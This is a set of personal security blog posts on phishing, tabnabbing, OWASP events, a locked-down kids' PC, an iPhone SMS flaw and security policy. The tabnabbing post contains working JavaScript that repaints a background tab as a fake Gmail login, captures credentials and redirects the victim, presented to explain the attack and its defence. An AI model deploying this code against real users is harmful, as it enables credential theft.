Software Defects – The Broken Windows of Cyberspace

We are gearing up for a major push of strategic security work and, as part of the backgrounding for one of the areas I will be working on, I spent an hour of my day listening to a 2009 presentation by David Rice, author of “Geekonomics – The Real Cost of Insecure Software”, which I have embedded below. It’s on the long side at around 1 hour, but certainly worth reviewing. If you can spare an eyeball, take the time to watch the presentation as David’s style is engaging and about as far from “Death by PowerPoint” as you can get.

Geekonomics: The Real Cost of Insecure Software from David Rice on Vimeo.

In typical spooky timing, a reminder about the OWASP NZ Day on July the 7th arrived in my inbox right in the middle of me watching the presentation video.

For those with an interest in security but yet to attend an OWASP event, it’s certainly something I’d recommend (register here), not only for the opportunity to chat to others in the industry, but for the great line-up of speakers. This year the event will again be held in Auckland and boasts the following topics:

  • Secure Development: What The OWASP Guide Didn’t Tell You – Blair Strang, Security-Assessment.com
  • I <3 Reporting – Managing Effective Web Application Assessments – Andrew Evans, Kiwibank
  • Testing Mobile Applications – Nick von Dadelszen, Lateral Security
  • Web Crypto for the Developer Who Has Better Things to Do – Adrian Hayes, Security-Assessment.com
  • Concurrency Vulnerabilities – Brett Moore, Insomnia Security
  • A Day in the Life of a WAF – Sam Pickles, F5
  • HTML5 Security – Mike Haworth & Kirk Jackson, Aura Information
  • Security File Uploads are Evil – Kirk Jackson, Aura Information
  • Security Sleeping Easy: Architecting Web Applications Securely – Mark Young, Datacom
  • Real Applications, Real Vulnerabilities, Really Exploited – Quintin Russ, SiteHost

For the developers, there are also two 3-hour training courses being held in parallel to the conference, but with seating limited to 20 participants per session I’d suggest registering quickly to reserve your spot. More information can be found here.

Tabnabbing – An Even More Evil Phishing Attack

Image by Flickr user 'Toasty' http://www.flickr.com/photos/toasty/1276202472/

Wow – I’ve just finished reading a recent blog post by Aza Raskin (creative lead for Firefox) and he presents an interesting new phishing attack vector for us to be(a)ware of, that of ‘Tabnabbing’.

For many of us, phishing attempts (that is, attempts by ‘evil’ sites or emails to pretend they are from legitimate sources and then dupe the user into revealing login credentials or other useful information) are fairly easy to spot. Some are stupidly obvious, such as the now well-known tale of the government official who needs to get large sums of money out of the country; others are less blatant and use shortened URL services or minor misspellings to trick people into clicking their links. But now, joining the ever-growing list of ways to socially engineer an inattentive user into revealing useful information, is some very clever JavaScript which seeks to fool us when we’re not looking!

The attack is structured as follows:

  1. The attacker gets a user to browse to a staging site.
  2. When the user switches focus to another tab, the staging site changes its favicon and the content displayed on the page to something the user will be familiar with – in his example, Aza uses a Gmail login or ‘credentials expired’ page.
  3. When the user next scans their open tabs, they recognise the familiar tab and switch to it, believing it to be the genuine article.
  4. Because it’s an existing open tab, they implicitly trust that the domain is what it should be (the address bar still shows the staging site, but nobody looks). From there the credentials are captured and the user is redirected back to the legitimate site, oblivious that they’ve been scammed.
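
To make the mechanics concrete, here is an added example (it is not code from Aza Raskin’s post or from this blog) that models the four steps above in JavaScript. The browser `document` and `window` are passed in rather than referenced globally, so the same functions run in a real page or, as below, against a constructed stand-in that lets the whole sequence execute offline under Node. The lookalike title, the favicon URL on `staging.example` and the Gmail target URL are illustrative assumptions, not details from the original post.

```javascript
// Added example, not code from Aza Raskin's post or from this blog. It models the
// four steps above (blur -> swap favicon/title/content -> capture -> bounce to the
// real site) with the browser objects injected, so the same functions run in a
// page or, as here, against a constructed stand-in for offline demonstration.
// The lookalike title, favicon URL and target URL are illustrative assumptions.

const LOOKALIKE = {
  title: "Gmail: Email from Google",            // what the victim expects in the tab strip
  favicon: "https://staging.example/gmail.ico", // attacker-hosted copy of the real favicon
  realSite: "https://mail.google.com/",         // where the victim is sent afterwards
};

// Replace (or create) the page's favicon <link>; browsers repaint the tab icon on change.
function setFavicon(doc, href) {
  let link = doc.querySelector('link[rel="icon"]');
  if (!link) {
    link = doc.createElement("link");
    link.rel = "icon";
    doc.head.appendChild(link);
  }
  link.href = href;
  return link;
}

// Step 2: once the tab has lost focus, repaint it as a "credentials expired" login page.
function nabTab(doc) {
  setFavicon(doc, LOOKALIKE.favicon);
  doc.title = LOOKALIKE.title;
  doc.body.innerHTML =
    "<h1>Your session has expired</h1>" +
    '<form id="login"><input name="user"><input name="pass" type="password">' +
    "<button>Sign in</button></form>";
}

// Steps 3-4: record whatever the victim types, then send them on to the real site.
// The origin recorded alongside the credentials is still the staging site.
function captureAndBounce(doc, win, fields, sink) {
  sink.push({ user: fields.user, pass: fields.pass, origin: win.location.href });
  win.location.href = LOOKALIKE.realSite;
}

// Wire the sequence to the window's blur event and expose the capture sink.
function installTabnab(doc, win) {
  const sink = [];
  win.addEventListener("blur", () => {
    if (doc.title !== LOOKALIKE.title) nabTab(doc); // swap once, stay swapped
  });
  return { sink, submit: (fields) => captureAndBounce(doc, win, fields, sink) };
}

// Constructed stand-in for document/window so the sequence runs under Node.
function makeFakeBrowser(stagingUrl) {
  const listeners = {};
  const head = { children: [], appendChild(el) { this.children.push(el); } };
  const doc = {
    title: "Cute cat pictures",
    head,
    body: { innerHTML: "<p>lots of cats</p>" },
    createElement: (tag) => ({ tagName: tag.toUpperCase() }),
    querySelector: (sel) =>
      sel === 'link[rel="icon"]' ? head.children.find((e) => e.rel === "icon") || null : null,
  };
  const win = {
    location: { href: stagingUrl },
    addEventListener: (type, fn) => { (listeners[type] = listeners[type] || []).push(fn); },
    fire: (type) => (listeners[type] || []).forEach((fn) => fn()),
  };
  return { doc, win };
}

// Run the attack once against the stand-in and report what the victim would see.
function demo() {
  const { doc, win } = makeFakeBrowser("https://staging.example/cats");
  const nab = installTabnab(doc, win);
  const before = { title: doc.title, url: win.location.href };
  win.fire("blur");                                   // step 2: victim switches tabs
  const icon = doc.querySelector('link[rel="icon"]');
  const after = { title: doc.title, favicon: icon ? icon.href : null, url: win.location.href };
  nab.submit({ user: "victim@example.com", pass: "hunter2" }); // steps 3-4: victim "logs in"
  return { before, after, captured: nab.sink, finalUrl: win.location.href };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Run under Node it prints the before and after state. The thing to notice is that `after.url` is still `https://staging.example/cats` while the title and favicon now say Gmail: the address bar is the one thing the script cannot repaint, which is why the defence is to check it (or to rely on a password manager that only offers credentials for the origin they were saved on) rather than on how the tab looks.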


A PC for the Kids: Introduction

With my wife adopting a new notebook, we’ve found ourselves with an additional, usable machine which we’ve earmarked for our boys’ use.

The unit in question is a rather dated IBM ThinkPad R51 which ran fine with Windows XP, but given that our boys are now of an age where they are becoming more inquisitive, I’ve decided that something a little more robust would better fit the bill than the aging Windows OS.

As a keen open source OS user myself, I’m planning to drop Ubuntu 10.04 LTS (Lucid Lynx) onto the notebook and then lock down the configuration to allow the boys to experiment, but not break the environment.

So, looking at the task list ahead of me, I’ll be looking to run through the following:

  1. Install the OS (release date is 29/04/2010)
  2. Install and configure parental control on the boys user accounts
  3. Lock down the rest of the system on the boys accounts
  4. Let the boys at the notebook and observe what usability issues crop up
  5. Tweak

The next few articles getting posted to the blog will be following through this list so I’ll be making extensive use of search engines, forums and any other resources I can leverage to get the best info to make this happen as painlessly as possible. Suggestions in the comments please 🙂



“If something seems too good to be true…

…it probably is.”

It’s an old, well-worn saying for sure, but it holds as true today as it did way back whenever the anonymous, cynical, amateur philosopher came up with it.

Recently in New Zealand there has been an increase in phishing attempts trying to get people to open email attachments which then deploy malware onto the computer and recruit your PC into a global network of compromised machines (a botnet).

A few weeks ago a number of emails arrived in various mailboxes I hold claiming to be from DHL or UPS and containing details of a package delivery. Over the last few days this threat has evolved to include messages purporting to be from Amazon and including details of a paid order.

The short version of this post is simply:

“Don’t open attachments from people you do not know”

…but we can also extend this advice to “Treat any attachments or links from people you think you may know with a healthy dose of caution”.

For those who are interested in a little more information

The biggest risk around phishing attacks is that they take advantage of our human nature: curiosity, implied trust of people (especially those we believe we know) and, dare we say it, greed. These “social hacks” work because it’s relatively simple to forge the sender and appearance of an email so it looks like it comes from a friend or colleague, or to obscure a link to make it appear that it comes from your bank or favourite social networking site.

It’s human nature…

The very nature of how we as humans operate is that once we recognise a name we believe we can trust, we instinctively lower our defenses to being scammed and are often convinced to click that link, or open that email attachment.

The best defense against such attempts is a healthy dose of skepticism. Look closely at the link (hover over it to see the real destination rather than the text it displays): does it look long and complicated? Does it point to, or redirect through, a web domain that you don’t recognise?

Scan your email attachments and, if you are in any doubt, contact your friend/colleague to check on the attachment’s validity. Or visit the website directly rather than clicking on the link within the message: if it is your bank contacting you, you’ll still be able to access the information directly from the bank’s website; if it is a message from Facebook, you’ll also be able to get those updates direct from the site.

Protection at Home

In terms of viruses and malware, at home we don’t have anything near the same level of protection that we may enjoy on a corporate network. It’s up to us, whether we’re at work or at home, to make the right decisions when dealing with any communications which may expose us, our machines or our data to risk. Email, Instant Messenger links, social network links/messages/applications, the list goes on – they’re all targets.

The best advice I can offer is:

  • Keep your operating system and applications updated with the latest patches as they are released
  • Invest in a good anti-virus/anti-malware program, keep it updated daily – and use it to perform regular full scans on your systems, as well as checking out those suspicious files
  • Access websites from your browser rather than via emailed links
  • Perform regular backups of your important files (don’t forget your digital photos & video)
  • If you think you may have been compromised, scan your systems, change your passwords and seek help.

Above all, employ a healthy dose of skepticism when dealing with communications that you are not expecting, even when you believe you know the sender – and be careful out there…

spyPhone or iPhone?

I’ve just finished reading this interesting article on an iPhone vulnerability which (could) propagate via SMS messaging and is due to be revealed at Black Hat in Las Vegas on Thursday (US time).

While currently unpatched, I imagine it’s got the attention of the team at Apple (though they haven’t responded – yet). So, in the meantime, be careful should you receive a txt message with a small square as its contents: the vulnerability reportedly allows the attacker to take control of many of the device’s functions, including the microphone and camera. 😯

Can Security Policy live in a Business World?

I’ve had a couple of decent articles come through my various feeds this morning in regards to IT Security and how companies are gaining traction for the acceptance and adoption of policies.

Image by Flickr user ianlloyd

Another point of interest raised by Forrester is the shift in spending toward security, but rather than defensive spending, the money is tending toward protecting the DATA. In an age where the security perimeter has shrunk from the outside of the business, to the connected systems, to any accessing device and right down to cheap, plentiful and high-capacity USB storage devices, a perimeter approach seems unnecessarily costly to say the least (of course, this must be tempered with assurance of systems availability). Where this falls down, however, is in the belief structure of an organisation. Don O’Neill states:

“Cost is a function of perceived value.”

Thus, if you are unable to convince your financial stakeholders to invest in security, you are unlikely to be able to implement worthwhile preventative measures. On the flip side of this argument, if your company is entrenched in a border-protectionism mindset, then a shift in focus to data protection (funded by reduced perimeter spending, whilst maintaining systems availability) is, again, unlikely to succeed in getting worthwhile preventative measures implemented.

Image by Flickr user thenickster

However, all is not lost – the other article discusses how we can use Social Psychology (PDF 213KB) to help encourage colleagues and influencers to adopt the policies we’d like to implement. For the most part, this is done by encouraging prosocial behaviors – that is, getting people to adopt the behaviors they believe others are already following. For instance, if I wished to encourage a corporate to focus on data protection, I would cite other companies such as Microsoft who are reducing their corporate firewalls on the perimeter and doing more to authenticate users prior to allowing data to be used (i.e. check I’m an employee before you let me open, read, edit, print or email this document).



The Network World article goes on to suggest some measures to encourage adoption:

  • Post statistical information about the rate of compliance with various security measures where people can see the information…
  • Use comparison statistics about compliance rates to encourage healthy competition among work groups…
  • Provide individual information to each user in a periodic report…
  • Have rotating messages appear about different applications…

The article ends with a call to action, so be sure to actually click through:

I’m sure that readers will have lots of ideas for how to apply Cialdini’s research findings. I suggest that everyone pitch in using the comment feature of this column to share these ideas…After all, 82% of all readers are cooperating with….

With all of the above in mind then – what can we do as Security Professionals to help protect our people from themselves and the big bad and nasty outside world? Well, like many others, my current soapbox is to get people to secure their files and encrypt their hard drives – do you have an area you’re focusing on? Discuss…

Portable Hacking Device for Soldiers

Now *this* is why it’d be fun to work in/with the military in an innovation (non-lethal) capacity… loads of funding, loads of scope… okay, perhaps not here in New Zealand, but in economies such as the US the defense contractors must get to play with some awesome toys, years ahead of the technology reaching the general populace…

Portable Hacking Device

Tanking Twimailer (and Trying Topify)

Yesterday Alain E. posted the following comment on my Twimailer article:

It is like Topify.com, but less interesting. And in addition their Twitter account is not even working. I personally tried both and prefer Topify (first because they have a much nicer site) because their emails are better and allow follow back right from the message. In addition, I had too much downtime with Twimailer…

To be honest, I’ve not had any issues with the [Twimailer] service to date, but this comment sparked my interest – which piqued when I read this article on Read Write Web. It appears that Twimailer has been sold (for a somewhat paltry sum) to an unknown party, who is in turn trying to flick the service off to another buyer less than a week after acquiring it.

As a result of this article, I have gone into my Twitter settings, changed my email back to the one used prior to the Twimailer service AND changed my password. Because Twimailer works by having Twitter send your account email to an address they control, whoever owns that mailbox can request a password reset for your account. I’d suggest that others do the same.

It may seem a little reactionary, but as I use my identity not only for my private tweets but also in support of my work, the potential threat of hijack is too high a price to pay for continued support of a service which has failed to inform its network of some pretty key changes in its organisation. Sorry Twimailer, it’s over between us, I’m moving on – and trying Topify.

So my thanks once again to Alain for piquing my interest, and to the guys at RWW for keeping across these technologies – these are the reasons that you get my subscriptions to your Twitter and RSS feeds.

Photo Credit: USFarmer / Redman

Security Companies on Twitter

Since moving from the R&D field into the amorphous world of IT security, I’ve been trawling the web to find good resources to add to my list of feeds and help me learn more about what we do as a collective, and how those stories are sold to the non-security folk.

It was with some interest that I clicked the link IT security vendors worth following on Twitter when today’s Network World security email arrived in my inbox. The article itself makes for some interesting reading, as does the Über list of IT and Network companies using Twitter.

For myself, I’m currently struggling with the streams I already follow and, while applications such as TweetDeck allow me to create groups of twitterers, the sheer volume of tweets I deal with day to day has convinced me to cherry-pick some of the selected “best of” tweeters for inclusion on my watchlist. They are as follows:

And of course, you can always follow me on Twitter as @NZRob

Health Monitoring 2.0?

Sorry about the headline, the 2.0 tag is getting waaay too much air time of late – that aside, I was reading an interesting article on some of the technology advances in the realms of health monitoring.

A few years ago I was researching some of the advances within medical monitoring and how the devices could be integrated into a connected home*. At that time we were looking at near-field communication devices which would upload via ZigBee or a similar low-range, low-power technology, as well as a concept toilet in Japan which measures and reports on glucose levels detected in one’s urine.

Anyway, with the advent of specifically addressable devices thanks to IPv6, as well as advances in near-field and Personal Area Networking (PAN), the reality may well be closer than we thought.

The self-care market is hotting up, especially in this difficult time where concern about the economy and one’s future financial well-being may well be impacting on people’s immediate and long-term health.

Some of the more interesting companies making headway in enabling health monitoring are:

  • Proteus Biomedical, who have just released their platform for body monitoring dubbed ‘Raisin’

Proteus ingestible event markers (IEMs) are tiny, digestible sensors…Once activated, the IEM sends an ultra low-power, private, digital signal through the body to a microelectronic receiver that is either a small bandage-style skin patch or a tiny device inserted under the skin. The receiver date- and time-stamps, decodes, and records information such as the type of drug, the dose, and the place of manufacture, as well as measures and reports physiologic measures such as heart rate, activity, and respiratory rate.

All of the data collected by the Proteus system can be sent wirelessly to the doctor for remote monitoring. The system is currently in clinical development.

  • BodyMedia have their SenseWear device which allows “monitoring of calories burned, dietary intake, duration of physical activity and sleep”. It’s USB-connected, which is fine, but I’d prefer to see a device that automated the process for more ‘real-time’ monitoring and feedback possibilities – all in time I guess, and the biggest issues will be size and battery life, just like every other mobile device.
  • Toumaz recognises the ‘you must remember to upload your data’ issue and has created their ‘Sensium’ device with the capability to stream the data to a logging device (within ~5m). This is the kind of thing I’d be looking for, but would want to incorporate into a meshed network within the bounds of a home (or health club) to make it truly useful.

Of course, with my day-job hat on as a security type person, the biggest concern, given the very personal nature of this data, is how security will be treated. Recent reports suggest a potential link to cyber terrorism, with the ability to cause widespread blackouts. Whether that threat is credible, or was a causative factor in the cited 2003 US blackouts, is debatable. What isn’t up for debate, however, is the fact that as more systems which control or influence our lives become network aware, the more this risk profile will inflate. How we deal with this is something which needs to be built into the monitoring protocols from the outset (authentication and encryption of the device links designed in, rather than bolted on afterwards), especially with the potential to link into the online health record repositories being toyed with by big players Google and Microsoft.

Comments?… Fear? Uncertainty? Doubt?

*A ‘connected home’ is what marketers refer to as a ‘future home’ – a term which I really hate as I agree with William Gibson “…the future is already here. It’s just not very evenly distributed…” (time code 11:55).